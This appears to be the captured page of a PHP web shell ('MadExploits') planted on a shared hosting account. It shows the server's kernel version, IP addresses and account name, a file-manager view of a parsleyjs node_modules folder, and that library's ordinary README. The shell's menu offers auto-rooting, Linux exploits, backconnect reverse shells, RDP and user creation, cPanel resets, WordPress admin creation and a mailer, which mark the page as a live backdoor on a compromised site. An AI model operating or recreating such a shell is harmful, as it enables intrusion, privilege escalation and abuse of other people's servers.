Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
parsleyjs /
[ HOME SHELL ]
Name
Size
Permission
Action
coverage
[ DIR ]
dr-xr-xr-x
dist
[ DIR ]
dr-xr-xr-x
src
[ DIR ]
dr-xr-xr-x
tools
[ DIR ]
dr-xr-xr-x
.babelrc
131
B
-rw-r--r--
.editorconfig
314
B
-rw-r--r--
.eslintrc
147
B
-rw-r--r--
.travis.yml
364
B
-rw-r--r--
CHANGELOG.md
9.71
KB
-rw-r--r--
LICENSE
1.1
KB
-rw-r--r--
README.md
1.64
KB
-rw-r--r--
UPGRADE-2.0.md
2.29
KB
-rw-r--r--
UPGRADE-2.1.md
544
B
-rw-r--r--
UPGRADE-2.2.md
684
B
-rw-r--r--
bower.json
655
B
-rw-r--r--
package.json
1.61
KB
-rw-r--r--
rollup.config.js
205
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# Parsley [](https://travis-ci.org/guillaumepotier/Parsley.js) JavaScript form validation, without actually writing a single line of JavaScript! ## Version 2.9.2 ## Doc See `index.html` and `doc/` ## Requirements [jQuery](https://jquery.com/) >= 1.8 (compatible with 2.x and 3.0) [es5-shim](https://github.com/es-shims/es5-shim) if you want need to support IE8 ## Questions? Please ask questions on [StackOverflow](https://stackoverflow.com/questions/ask) and be sure to include the `parsley.js` tag. Please **provide an example**, starting for example from [this jsfiddle](https://jsfiddle.net/marcandre/58vnaqur/) ## Contributing See the [`CONTRIBUTING.md` file](https://github.com/guillaumepotier/Parsley.js/blob/master/CONTRIBUTING.md) ## Integrations Create integration with other framework as a separate Github repo and send a pull request for including here. Some integrations are * [CakePHP](https://github.com/Codaxis/parsley-helper) * [Django](https://github.com/agiliq/django-parsley) * [Rails](https://github.com/mekishizufu/parsley-rails) * [OSSCDN by MaxCDN](https://osscdn.com/#/parsleyjs) * [Drupal](https://www.drupal.org/project/parsley) ## Install dev environment and running tests First time: install `npm` and: ``` npm install -g gulp ``` then ``` npm install gulp test ``` ## Build `dist/` and `doc/annotated-source` ``` gulp build ``` ## Run tests In the browser: run a server with `gulp test-browser`, then open `test/runner.html` In the terminal: `gulp test` ## License Released under the MIT License. See the bundled `LICENSE` file for details.
Close